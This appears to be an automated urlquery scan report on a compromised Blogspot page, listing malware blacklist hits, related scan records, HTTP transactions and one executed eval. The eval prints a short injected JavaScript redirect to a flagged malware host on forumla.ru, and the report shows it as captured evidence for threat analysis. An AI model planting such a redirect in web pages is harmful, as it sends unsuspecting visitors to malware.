Overview

URL: tektekdunk.blogspot.com.es/2013/03/efax-corporate.html
IP: 172.217.22.161
ASN: AS15169 Google Inc.
Location: United States
Report completed: 2017-12-11 21:36:43 CET
urlquery Alerts: Detects suspicious URL pattern


Settings

UserAgent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata w/ Emerging Threats Pro: No alerts detected


Blacklists

MDL: No alerts detected
OpenPhish: No alerts detected
PhishTank: No alerts detected
Fortinet's Web Filter:
Added / Verified  Severity  Host                                                    Comment
2017-12-11        2         tektekdunk.blogspot.com.es/2013/03/efax-corporate.html  Malware
2017-12-11        2         tektekdunk.blogspot.no/2013/03/efax-corporate.html      Malware
2017-12-11        2         forumla.ru:8080/forum/links/column.php                  Malware
DNS-BH: No alerts detected
mnemonic secure dns: No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 172.217.22.161

Date                       UQ / IDS / BL  URL                                                  IP
2018-01-11 17:47:01 +0100  0 - 0 - 0      https://mail-attachment.googleusercontent.com (...)  172.217.22.161
2018-01-11 17:21:12 +0100  0 - 0 - 2      boy-creative.blogspot.com/p/drama.htm                172.217.22.161
2018-01-11 16:55:05 +0100  0 - 0 - 5      hmpfisikauinsgd.blogspot.com/                        172.217.22.161
2018-01-11 16:54:54 +0100  0 - 2 - 0      https://rihac.blogspot.com/2013/11/dampak-pos (...)  172.217.22.161
2018-01-11 16:47:57 +0100  0 - 1 - 5      ndikichida.blogspot.com/2012/01/makalah-siste (...)  172.217.22.161
2018-01-11 16:45:56 +0100  2 - 0 - 2      realhackerspoint.blogspot.com/2013/05/trackin (...)  172.217.22.161
2018-01-11 16:43:21 +0100  0 - 0 - 2      pequenosescritores-carmelinha.blogspot.com.br (...)  172.217.22.161
2018-01-11 16:25:15 +0100  0 - 0 - 1      afrixgames.blogspot.com/2013/02/free-download (...)  172.217.22.161
2018-01-11 16:20:41 +0100  0 - 0 - 2      boy-creative.blogspot.com/p/sastra-sunda.htm         172.217.22.161
2018-01-11 16:11:23 +0100  0 - 0 - 0      https://lh5.googleusercontent.com/itnz7iF9M2a (...)  172.217.22.161

Last 10 reports on ASN: AS15169 Google Inc.

Date                       UQ / IDS / BL  URL                                                  IP
2018-01-21 08:56:51 +0100  0 - 0 - 2      www.debrastagi.com/2011/10/kaspersky-keys-kav (...)  172.217.21.147
2018-01-21 08:41:02 +0100  0 - 0 - 2      josh-morgan-subways-news.blogspot.se/search/l (...)  172.217.21.129
2018-01-21 08:31:18 +0100  0 - 0 - 1      canaldefutbolenvivo.com/                             172.217.21.147
2018-01-21 08:24:06 +0100  2 - 0 - 6      apenasmediafire.blogspot.com/search/label/fil (...)  172.217.21.129
2018-01-21 08:20:01 +0100  0 - 0 - 1      venturead.com/script/suurl.php?r=1225997             23.236.58.71
2018-01-21 08:07:53 +0100  0 - 0 - 1      harry-judd-attitude-news.blogspot.com.es/sear (...)  172.217.21.129
2018-01-21 07:58:10 +0100  0 - 0 - 3      www.disappointeddisappointing2608.blogspot.fr (...)  172.217.21.129
2018-01-21 07:57:51 +0100  0 - 0 - 2      disappointeddisappointing2608.blogspot.fr/sea (...)  172.217.21.129
2018-01-21 07:54:23 +0100  0 - 0 - 4      baixarfifa15.blogspot.com/search/label/FIFA%2 (...)  172.217.21.129
2018-01-21 07:47:41 +0100  2 - 0 - 3      www.medicineforthepeoplee.com/2017/09/downloa (...)  172.217.21.147

Last 3 reports on domain: tektekdunk.blogspot.com.es

Date                       UQ / IDS / BL  URL                                                  IP
2017-11-19 01:01:22 +0100  1 - 0 - 4      www.tektekdunk.blogspot.com.es/2013/02/britis (...)  216.58.211.129
2017-11-19 01:01:19 +0100  1 - 0 - 3      tektekdunk.blogspot.com.es/2013/02/british-ai (...)  216.58.211.129
2017-10-03 15:05:36 +0200  1 - 0 - 3      tektekdunk.blogspot.com.es/2013/03/efax-corpo (...)  216.58.209.97


JavaScript

Executed Scripts (9)


Executed Evals (1)

#1 JavaScript::Eval (size: 103, repeated: 1) - SHA256: dd2018ac1ec631bba571e09c1e98b575723d706f8a243c854a88aaeeb3b8adfc

var1 = 49;
var2 = var1;
if (var1 == var2) {
    document.location = "http://forumla.ru:8080/forum/links/column.php";
}

Executed Writes (0)



HTTP Transactions (26)


Request Response
                                        
                                            GET /2013/03/efax-corporate.html HTTP/1.1 
Host: tektekdunk.blogspot.com.es
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.217.22.161
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
                                        
Location: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Content-Encoding: gzip
Date: Mon, 11 Dec 2017 20:42:46 GMT
Expires: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 198
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   198
Md5:    dd0ca61e116adc288d7076c7ea513c8c
Sha1:   a78d46d7eec4a807fcc1f048c804a9e4a0eb21b8
Sha256: 50ae66c4efc349e9c0de9cc77b4808e3aa5fffc5da5f46014a2f7609e0a2e1d4

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /2013/03/efax-corporate.html HTTP/1.1 
Host: tektekdunk.blogspot.no
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
                                        
Expires: Mon, 11 Dec 2017 20:42:46 GMT
Date: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: private, max-age=0
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Etag: W/"03a63c64f71485c82a2f64efbd0a532eda39d83c9bcec59e8f439a250f07389a"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 9125
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   9125
Md5:    11a8bc370f0c5fd740a076603beb65d7
Sha1:   50d0b0cd4260be907683b7793f26cbdcadfbcc1f
Sha256: 67ce5835f45bca284004ac039911380c6d2fa45d659fe5918feec1720be2a597

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:46 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    19ef99ced385814f909e722e58764dcc
Sha1:   fb13af586cea82c57026e511346d56968a9816b0
Sha256: da16f981c66b594aadc1f084caabcd5fce2d21c25812b8849317c460d1282082
                                        
                                            POST /gsr2 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 112
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 468
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   468
Md5:    6bf50ec404fb4a8b4a94be8390d11938
Sha1:   0caaab7704d6221abc5e0342909a4928cee50b1c
Sha256: 63b592179b1e9a528344ce1d430b9479fc55f43420a468ec35aaeaa9dff911cf
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: public, max-age=345600
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    6200946bb21dadf64e775be4c1477589
Sha1:   20dadb32b68b14a5e6a5553c9f2b8513c9fc57b6
Sha256: f3d5bf0b6153233f3561176e789aea80d29708f7f98019d416ae6c31927d04a7
                                        
                                            GET /static/v1/widgets/3332739511-widget_css_bundle.css HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 7982
Date: Sat, 09 Dec 2017 19:26:50 GMT
Expires: Sun, 09 Dec 2018 19:26:50 GMT
Last-Modified: Sat, 09 Dec 2017 18:25:48 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177357
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   7982
Md5:    d342012bb968e58616411584557ea607
Sha1:   8e698a3e4a67432fd5b28eb68a7d00ce52bc13f5
Sha256: 4e02127ac31a445d8ebb1681f44c2ceb56e7e55d1d2a443a80962909b0c23467
                                        
                                            GET /serve/namelesscreator.googlepages.com/recent-post.js HTTP/1.1 
Host: bloggerhosting.appspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         216.58.211.148
HTTP/1.1 503 Service Unavailable
Content-Type: text/html
                                        
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: Google Frontend
Content-Length: 95


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   95
Md5:    30546616f959cdf65e943e65f1e025f5
Sha1:   970c065540d7fbcc9296ebb4c1ca0294abd3c103
Sha256: 25ca9c49ab16a0e83faac79b06ddc8b15ee7f3118f09e2b7b2b46da52a1e9fa1
                                        
                                            GET /js/plusone.js HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         216.58.211.142
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
x-ua-compatible: IE=edge, chrome=1
Timing-Allow-Origin: *
Etag: "aac1a14663d33bf4c6d07795a47bf6bc"
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: private, max-age=1800, stale-while-revalidate=1800
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Strict-Transport-Security: max-age=31536000
Content-Encoding: gzip
Server: ESF
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Set-Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv;Domain=.google.com;Path=/;Expires=Tue, 12-Jun-2018 20:42:47 GMT;HttpOnly
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   16872
Md5:    47d2a610f3a4575abf4744830b10f05a
Sha1:   5462683eca02fbab223acaba81db21a354323ff0
Sha256: d35c4db71a7ea54c94e6b2ca7ca8184bbfb16f9f9f436e1c715a80d3bfbcd959
                                        
                                            GET /static/v1/jsbin/1930376684-comment_from_post_iframe.js HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4408
Date: Sat, 09 Dec 2017 19:27:43 GMT
Expires: Sun, 09 Dec 2018 19:27:43 GMT
Last-Modified: Sat, 09 Dec 2017 15:22:43 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177304
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   4408
Md5:    51c14805118fe950fd6aa861ef4813fb
Sha1:   d5d4b010d0a2920a4c115f656d800c30d7fa54b8
Sha256: 93262de70a34fb45095a255d5f8b2d118c224324da33bd151bc95cfeaea38358
                                        
                                            GET /static/v1/widgets/2060351197-widgets.js HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/javascript
                                        
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 45861
Date: Sat, 09 Dec 2017 19:31:23 GMT
Expires: Sun, 09 Dec 2018 19:31:23 GMT
Last-Modified: Sat, 09 Dec 2017 08:25:15 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 177084
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   45861
Md5:    8c80881ffc98fdd432739691fb9ff023
Sha1:   111b9b51194ed6d5b4a3f761e4819083104b2531
Sha256: cdcc802712c549875eb16f72a2bb3d0e2977d3257344ee244060c110e54274ec
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: segienim.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"23e038e0acbb18ea0d9e91c70edec61b28f6e13f71626d5e19091489397de570"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 17 Sep 2015 05:59:07 GMT
Content-Length: 13992
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13992
Md5:    e83d9daf2461158be85dca2efc33d58d
Sha1:   19ea1cd89879b5d775d1cedfbd329568ddfe0bdc
Sha256: 7e4d3beb023f84c747a0e9384141e5abdea86c07646ea7a5f9e4805f29204c89
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: tektekdunk.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"649c2b624a618ecabc6ec29fb05677317bab3b850e04e8173840ce7a062d9518"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Content-Length: 13991
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13991
Md5:    fa6017b44b1bb35129006c95c8f00001
Sha1:   cdfb5f053feb6b92bc72501b1f9e0db99c5fc471
Sha256: 0335701913da1d7fc30183fbe6318d7a947e54a95b06de05890b31925fc046f5
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: ziggot.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"246c4f0d4f65a7cd1462d1333a357025d87ae7931f0435194db338b0a9a802ed"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Tue, 07 Oct 2014 02:11:15 GMT
Content-Length: 13956
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13956
Md5:    887f05ecc30796b40fa9c3ca6dbe570d
Sha1:   aa44cb58969f7af477fee4b6b4b1cdb0c7eec6d5
Sha256: c8b732a870b6a16202c952e6687f3a6268a606aaf48d55c6bbd07d8d8bd61587
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: assudah.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"fd68d633fad54d82c5222c93f853962ce9e77db731b0ef30c8b63166f6e767ed"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 02 Oct 2014 05:51:44 GMT
Content-Length: 13949
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13949
Md5:    f8792562f5f360c7302a5f415284665a
Sha1:   8caaa23a95f196b428b5fe145bfb21654de14d74
Sha256: 4e3e7644726bff5c2b245eea4c40cac6bd64883ccded745f92e85b8208f41cf3
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: alabik.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"37f994e53eff9fb3193acdd80ffb8b86932ed2a2ef0948f460a7e01f0d83de9c"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Sun, 19 Nov 2017 15:39:20 GMT
Content-Length: 35849
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   35849
Md5:    502376b485e9d6c4d4eec2ca1b7563b6
Sha1:   77da4be0769cab1223a7d37d746dad1384de5be0
Sha256: 657e7bbb1b487c9a2e5327568fd57c926e022a804b6baf53988e0c46a297edc5
                                        
                                            GET /dyn-css/authorization.css?targetBlogID=4915900961802978781&zx=014439bd-0793-4c4d-a51b-3c274c89153e HTTP/1.1 
Host: www.blogger.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: text/css; charset=UTF-8
                                        
P3P: CP="This is not a P3P policy! See https://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Cache-Control: private, max-age=1800
Pragma: no-cache
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Last-Modified: Mon, 11 Dec 2017 20:42:47 GMT
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   21
Md5:    b9afc501fc43fbea335a2dc5d43263a1
Sha1:   7290a2dd6afbf39ecfc35b52dfb32a38fc222994
Sha256: d6e425ca7840c0ab6f26f5fc2822a47e26b4a8bbd104468a9c185bc132b8662f
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: babakbingkas.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"65f52af629a004797d8277b3788d45ce05e37292c2d9e935c0a57526da3569f0"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Thu, 02 Oct 2014 05:57:50 GMT
Content-Length: 13555
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   13555
Md5:    270406a5a1537988ef6d0d92d52d6673
Sha1:   38ae8d8c7ddc0c375e1f3dd51629ca7079ebfb09
Sha256: 689e87ee082da53d796fc69cd565424fd509e34cd9621020c01eaa91104300ba
                                        
                                            GET /img/icon18_edit_allbkg.gif HTTP/1.1 
Host: resources.blogblog.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Accept-Ranges: bytes
Content-Length: 162
Date: Sat, 09 Dec 2017 19:33:11 GMT
Expires: Sat, 16 Dec 2017 19:33:11 GMT
Last-Modified: Fri, 08 Dec 2017 19:28:35 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 176976
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  GIF image data, version 89a, 18 x 18
Size:   162
Md5:    c991641178ff05adf0d004298b5eafa9
Sha1:   d8f6ce8ecd92b86d49849360f6b81ceb10b4c941
